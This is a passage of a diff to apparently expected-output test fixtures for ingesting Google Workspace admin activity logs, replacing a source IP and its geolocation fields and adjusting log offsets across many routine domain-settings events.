+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_CUSTOM_LOGO\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -1630,26 +1510,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 13078,
+ "log.offset": 13048,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -1670,7 +1546,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DATA_LOCALIZATION_FOR_RUSSIA\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DATA_LOCALIZATION_FOR_RUSSIA\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -1684,26 +1560,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 13458,
+ "log.offset": 13427,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -1725,7 +1597,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DATA_LOCALIZATION_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DATA_LOCALIZATION_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -1739,26 +1611,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 13919,
+ "log.offset": 13887,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -1779,7 +1647,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DATA_PROTECTION_OFFICER_CONTACT_INFO\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"INFO_TYPE\",\"value\":\"ADDRESS\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DATA_PROTECTION_OFFICER_CONTACT_INFO\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"INFO_TYPE\",\"value\":\"ADDRESS\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -1793,26 +1661,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 14377,
+ "log.offset": 14344,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -1833,7 +1697,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"DELETE_PLAY_FOR_WORK_TOKEN\",\"parameters\":[{\"name\":\"PLAY_FOR_WORK_TOKEN_ID\",\"value\":\"token\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"DELETE_PLAY_FOR_WORK_TOKEN\",\"parameters\":[{\"name\":\"PLAY_FOR_WORK_TOKEN_ID\",\"value\":\"token\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "deletion"
@@ -1845,26 +1709,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 14846,
+ "log.offset": 14812,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -1885,7 +1745,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VIEW_DNS_LOGIN_DETAILS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VIEW_DNS_LOGIN_DETAILS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "info"
@@ -1897,26 +1757,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 15239,
+ "log.offset": 15204,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -1937,7 +1793,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DOMAIN_DEFAULT_LOCALE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DOMAIN_DEFAULT_LOCALE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -1951,26 +1807,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 15623,
+ "log.offset": 15587,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -1991,7 +1843,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DOMAIN_DEFAULT_TIMEZONE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DOMAIN_DEFAULT_TIMEZONE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -2005,26 +1857,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 16083,
+ "log.offset": 16046,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -2045,7 +1893,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DOMAIN_NAME\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DOMAIN_NAME\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -2058,26 +1906,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 16545,
+ "log.offset": 16507,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -2098,7 +1942,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_ENABLE_PRE_RELEASE_FEATURES\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_ENABLE_PRE_RELEASE_FEATURES\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -2111,26 +1955,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 16960,
+ "log.offset": 16921,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -2151,7 +1991,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DOMAIN_SUPPORT_MESSAGE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DOMAIN_SUPPORT_MESSAGE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -2165,26 +2005,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 17391,
+ "log.offset": 17351,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -2205,7 +2041,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_TRUSTED_DOMAINS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_TRUSTED_DOMAINS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -2217,26 +2053,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 17852,
+ "log.offset": 17811,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
